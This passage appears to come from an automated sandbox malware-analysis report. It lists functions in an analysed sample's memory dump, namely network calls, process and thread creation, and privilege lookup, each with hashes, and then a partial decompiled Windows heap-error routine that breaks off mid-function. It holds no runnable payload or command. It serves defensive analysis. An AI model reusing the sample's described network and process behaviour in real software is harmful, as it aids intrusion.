                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 00798928
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: HttpOpenRequest
                                                                                            • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                                                            • API String ID: 1984915467-4016285707
                                                                                            • Opcode ID: 605b4d0fa08a74b63c44ab8c643b1c1b7b1e8809eb2b174666cc535769be2ed3
                                                                                            • Instruction ID: e5d68d007667cd627ea5e9a8876254375f3770ae8286719c73caecb1423086fe
                                                                                            • Opcode Fuzzy Hash: 605b4d0fa08a74b63c44ab8c643b1c1b7b1e8809eb2b174666cc535769be2ed3
                                                                                            • Instruction Fuzzy Hash: F50117B2905159AFCB14DF98D881DEF7BB9EF89210F158248FD08A7245C630AD10CBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00798836, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 50networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 007988A8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ConnectInternet
                                                                                            • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                                            • API String ID: 3050416762-1024195942
                                                                                            • Opcode ID: c9aa46f1c961d0ac685b8fd51feefcb5bb4134e96ff90580775f2c5bd08472a3
                                                                                            • Instruction ID: f6678db4434ce92768df1f5c6c05595eecfa2600e1cdf31c7bcc192ef985bc7a
                                                                                            • Opcode Fuzzy Hash: c9aa46f1c961d0ac685b8fd51feefcb5bb4134e96ff90580775f2c5bd08472a3
                                                                                            • Instruction Fuzzy Hash: AB011EB2905158AFCB14DF99D981EEF7BB9FB49310F154148FA08A7205C6309E10CBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00798840, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 007988A8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ConnectInternet
                                                                                            • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                                            • API String ID: 3050416762-1024195942
                                                                                            • Opcode ID: 9d030a777e5cccec2ac6e3d13d24fbac149be2e6a7ed5dee5ea452bd7c4c0401
                                                                                            • Instruction ID: 041e99f8fc85ef12c29be2734fe186e8e549671e399f1994b89a83a6836248a9
                                                                                            • Opcode Fuzzy Hash: 9d030a777e5cccec2ac6e3d13d24fbac149be2e6a7ed5dee5ea452bd7c4c0401
                                                                                            • Instruction Fuzzy Hash: 6601E9B2915118AFCB14DF99D941EEF77B9EB48310F154289BE08A7241D630EE10CBE1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 007987D0, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00798827
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: InternetOpen
                                                                                            • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                                            • API String ID: 2038078732-3155091674
                                                                                            • Opcode ID: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
                                                                                            • Instruction ID: e17c92f34e814320d1eb1141cf99a8c2893b2d21ead8614111586ee6a802dee0
                                                                                            • Opcode Fuzzy Hash: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
                                                                                            • Instruction Fuzzy Hash: ABF019B2911128AF8B14DF98EC41DFBB7B8EF48310B048589BE18A7205D634AE10CBE1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 007987C8, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 40networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00798827
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: InternetOpen
                                                                                            • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                                            • API String ID: 2038078732-3155091674
                                                                                            • Opcode ID: aa3e99256014bda4c9af87b8a30cb13105d69504205f53cfc7184a3d27ad6ac8
                                                                                            • Instruction ID: d7158570efdab3bb7b40429a1f3c5539daf3f277997d7b5cb347b04790477b28
                                                                                            • Opcode Fuzzy Hash: aa3e99256014bda4c9af87b8a30cb13105d69504205f53cfc7184a3d27ad6ac8
                                                                                            • Instruction Fuzzy Hash: 97016DB2901129AFCB14DFA8D885DEF7B79EF49310B048189FD54A7205D634AA11CBE1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00796ED0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(000007D0), ref: 00796F78
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID: net.dll$wininet.dll
                                                                                            • API String ID: 3472027048-1269752229
                                                                                            • Opcode ID: d587dad9b02e6da53202134dba226773cf49988327008f2b2850a1930fd7bfae
                                                                                            • Instruction ID: 8d222c7d6c084a296ff072421a665e5467b20134a697aad2aa7be6a6955e9e62
                                                                                            • Opcode Fuzzy Hash: d587dad9b02e6da53202134dba226773cf49988327008f2b2850a1930fd7bfae
                                                                                            • Instruction Fuzzy Hash: 9931A1B5601704ABCB15EF68E8A5FA7BBB9BB48700F00851DF61A5B241D734B945CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00796EC8, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(000007D0), ref: 00796F78
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID: net.dll$wininet.dll
                                                                                            • API String ID: 3472027048-1269752229
                                                                                            • Opcode ID: ee6bf49ee07ab8f3c181f06646a936d903699263e1cfb984f0dea38ee53b3ea1
                                                                                            • Instruction ID: 431ddc051fe6280cd8318de817007ac13e13f9b5c4fff6849f0272523e18aecc
                                                                                            • Opcode Fuzzy Hash: ee6bf49ee07ab8f3c181f06646a936d903699263e1cfb984f0dea38ee53b3ea1
                                                                                            • Instruction Fuzzy Hash: 7231E6B1601700EBDB11EF68E8A1FABBBB5FF84700F10811DF6195B241D378A945CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00798447, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(00793506,?,00793C7F,00793C7F,?,00793506,?,?,?,?,?,00000000,00000000,?), ref: 007984AD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID: hy
                                                                                            • API String ID: 1279760036-1624030379
                                                                                            • Opcode ID: 18e86575d9df3628f782bd7008b084f41119d377f426bfb1cbe0513669106961
                                                                                            • Instruction ID: 0cb52fdf77cad69670afc70e23539fa3f50d5d1781f8d8633f0abbe037d82de4
                                                                                            • Opcode Fuzzy Hash: 18e86575d9df3628f782bd7008b084f41119d377f426bfb1cbe0513669106961
                                                                                            • Instruction Fuzzy Hash: CAF06276300215AFDB24EF98EC84EE7736DEF883A0B108559FA4C9B311D931EA1587E0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 007984B4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00783B93), ref: 007984ED
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FreeHeap
                                                                                            • String ID: .z`
                                                                                            • API String ID: 3298025750-1441809116
                                                                                            • Opcode ID: 1003aea85140daa6256f232bd95707a379daf1b87b4ad07b3350c04b4954d5c9
                                                                                            • Instruction ID: d3010f53151e04f9ba768c02012f72980f19570841a07f0b85b267edfa8c7976
                                                                                            • Opcode Fuzzy Hash: 1003aea85140daa6256f232bd95707a379daf1b87b4ad07b3350c04b4954d5c9
                                                                                            • Instruction Fuzzy Hash: 40E092B1200304BBDB14DF65DC49EA7376CAF88750F114199FE085B382D531E901CBE0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 007984C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00783B93), ref: 007984ED
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FreeHeap
                                                                                            • String ID: .z`
                                                                                            • API String ID: 3298025750-1441809116
                                                                                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                            • Instruction ID: bc44e4cae7d790a8f9dbc5a7c134569b8cc85ccaf001aaae17c1bc2c61239acd
                                                                                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                            • Instruction Fuzzy Hash: 02E01AB1200204ABDB14DF59DC49EA777ACAF88750F014554BA0857341CA30E9108AF0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00787260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 007872BA
                                                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 007872DB
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID:
                                                                                            • API String ID: 1836367815-0
                                                                                            • Opcode ID: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                                                            • Instruction ID: d2949731ee2777f199cf9ebe41116f2cb24d54172ae65103e1eddead67ac3ff7
                                                                                            • Opcode Fuzzy Hash: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                                                            • Instruction Fuzzy Hash: F401DB32A80328B7EB25B6949C47FFE776C6B00B50F140119FF04BA1C2E698AD0687F5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0079852D, Relevance: 1.6, APIs: 1, Instructions: 57processCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00798584
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateInternalProcess
                                                                                            • String ID:
                                                                                            • API String ID: 2186235152-0
                                                                                            • Opcode ID: a1612ac63e0905b6c1ed067f8d99531d2630b0d74cedcee3656bc465a2333204
                                                                                            • Instruction ID: 20cf7f1b92386b7d3c92f1f4b514b226d6c18a1ce4f1ffaed2deb1623dc34cd2
                                                                                            • Opcode Fuzzy Hash: a1612ac63e0905b6c1ed067f8d99531d2630b0d74cedcee3656bc465a2333204
                                                                                            • Instruction Fuzzy Hash: B311F3B2200108BBCB44DF99DC84DEB77ADAF8D754F118258FA0DD7241DA34E9118BE1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00789B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00789B82
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Load
                                                                                            • String ID:
                                                                                            • API String ID: 2234796835-0
                                                                                            • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                            • Instruction ID: ade9cd095a7f98677d3082dac2f7cc71f00891f4306227cd68b1bdd36f81273c
                                                                                            • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                            • Instruction Fuzzy Hash: C5011EB5D4020DBBDF10EBE4EC46FADB7B89B54308F044195EA0897241F635EB14CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00798530, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00798584
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateInternalProcess
                                                                                            • String ID:
                                                                                            • API String ID: 2186235152-0
                                                                                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                            • Instruction ID: d987a3632fbf342c552e4b40d132f24f2951516ee368e7955f5740f750fed147
                                                                                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                            • Instruction Fuzzy Hash: 1001AFB2210108BBCB54DF89DC80EEB77ADAF8C754F158258BA0D97241CA30E851CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00796FF3, Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0078CCC0,?,?), ref: 0079703C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateThread
                                                                                            • String ID:
                                                                                            • API String ID: 2422867632-0
                                                                                            • Opcode ID: 9a44dde10a67189f5355af6f7bfa10913007d1852b46debec506ea6fc2be7da6
                                                                                            • Instruction ID: 9d66e00dcd342639f1156bc7ed80c780f1e8f3247287149363c4ff3d3bfeadbf
                                                                                            • Opcode Fuzzy Hash: 9a44dde10a67189f5355af6f7bfa10913007d1852b46debec506ea6fc2be7da6
                                                                                            • Instruction Fuzzy Hash: 53F0657228021077DB306658DC43FE77258DB95B50F250019F749AB2C1D999B90246E5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00797000, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0078CCC0,?,?), ref: 0079703C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateThread
                                                                                            • String ID:
                                                                                            • API String ID: 2422867632-0
                                                                                            • Opcode ID: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
                                                                                            • Instruction ID: a90d9b59b3b9bf23df0115562ad77ed1f99502ee81ea3cb6eace5d995d903804
                                                                                            • Opcode Fuzzy Hash: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
                                                                                            • Instruction Fuzzy Hash: E1E092333903047AE730659DAC03FA7B39CCB81B20F15002AFB0DEB2C1E599F90142A4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00798480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(00793506,?,00793C7F,00793C7F,?,00793506,?,?,?,?,?,00000000,00000000,?), ref: 007984AD
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                            • Instruction ID: a47439210d145ef22f98215a660a1fa5fbbcdb1c837a73721d63ad0384dee3b3
                                                                                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                            • Instruction Fuzzy Hash: 83E012B1200208ABDB14EF99DC45EA777ACAF88650F118558BA089B382CA30F9108AF0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00798620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0078CF92,0078CF92,?,00000000,?,?), ref: 00798650
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                            • Instruction ID: 3788d0222633143d88c38a07f9c865f45e4dc3f7347b8a90272c760c6972bf84
                                                                                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                            • Instruction Fuzzy Hash: 35E01AB1200208ABDB10DF49DC85EE737ADAF89650F018154BA0857341C934E8108BF5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0078D400, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00787C63,?), ref: 0078D42B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                            • Instruction ID: 3df48c774f7bc6a101039e1bb828d5d4e805d7d1ee316ce0165d0f18f3ff3d8b
                                                                                            • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                            • Instruction Fuzzy Hash: C1D0A7717903043BEA10FAA49C07F2633CD9B44B00F494064F94CD73C3E964F9004261
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D1967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 4e3f4758f5008d6f9e8d07dacac2da59b51dadaefcc91eb4cbb9a1e964b2cd26
                                                                                            • Instruction ID: 825b3e7bdb85d2d8341416f5764a0198fbf536146f38aebf06cf749052af146b
                                                                                            • Opcode Fuzzy Hash: 4e3f4758f5008d6f9e8d07dacac2da59b51dadaefcc91eb4cbb9a1e964b2cd26
                                                                                            • Instruction Fuzzy Hash: 7EB02BB19010C0C9F700D7600708717390077D0304F22C051D2020241A0338D0C0F1B1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Function 04D8B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 04D8B476
                                                                                            • The instruction at %p tried to %s , xrefs: 04D8B4B6
                                                                                            • *** An Access Violation occurred in %ws:%s, xrefs: 04D8B48F
                                                                                            • The resource is owned exclusively by thread %p, xrefs: 04D8B374
                                                                                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 04D8B314
                                                                                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 04D8B2F3
                                                                                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 04D8B323
                                                                                            • a NULL pointer, xrefs: 04D8B4E0
                                                                                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 04D8B305
                                                                                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 04D8B53F
                                                                                            • <unknown>, xrefs: 04D8B27E, 04D8B2D1, 04D8B350, 04D8B399, 04D8B417, 04D8B48E
                                                                                            • This failed because of error %Ix., xrefs: 04D8B446
                                                                                            • Go determine why that thread has not released the critical section., xrefs: 04D8B3C5
                                                                                            • write to, xrefs: 04D8B4A6
                                                                                            • *** enter .exr %p for the exception record, xrefs: 04D8B4F1
                                                                                            • *** enter .cxr %p for the context, xrefs: 04D8B50D
                                                                                            • The resource is owned shared by %d threads, xrefs: 04D8B37E
                                                                                            • *** then kb to get the faulting stack, xrefs: 04D8B51C
                                                                                            • The critical section is owned by thread %p., xrefs: 04D8B3B9
                                                                                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04D8B3D6
                                                                                            • an invalid address, %p, xrefs: 04D8B4CF
                                                                                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 04D8B484
                                                                                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 04D8B2DC
                                                                                            • read from, xrefs: 04D8B4AD, 04D8B4B2
                                                                                            • *** Resource timeout (%p) in %ws:%s, xrefs: 04D8B352
                                                                                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 04D8B39B
                                                                                            • *** Inpage error in %ws:%s, xrefs: 04D8B418
                                                                                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 04D8B47D
                                                                                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04D8B38F
                                                                                            • The instruction at %p referenced memory at %p., xrefs: 04D8B432
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                            • API String ID: 0-108210295
                                                                                            • Opcode ID: 5064d14c31e2c502fbe81c4a11a2448070b4187ac8e14187c36b62d62c5f53cf
                                                                                            • Instruction ID: 82a6036dce7a8f7152ba098faa787212054171a20b5ae583e0dc48244919ab20
                                                                                            • Opcode Fuzzy Hash: 5064d14c31e2c502fbe81c4a11a2448070b4187ac8e14187c36b62d62c5f53cf
                                                                                            • Instruction Fuzzy Hash: C5810675B40210FFEB21BE09AC66D7B3B27EF46B59F00006DF1062B112E261B491DBB6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D91C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 44%
                                                                                            			E04D91C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x4cb48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04CDB150();
				} else {
					E04CDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x4dc589c);
				E04CDB150("Heap error detected at %p (heap handle %p)\n",  *0x4dc58a0);
				_t27 =  *0x4dc5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M04D91E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04CDB150();
				} else {
					E04CDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
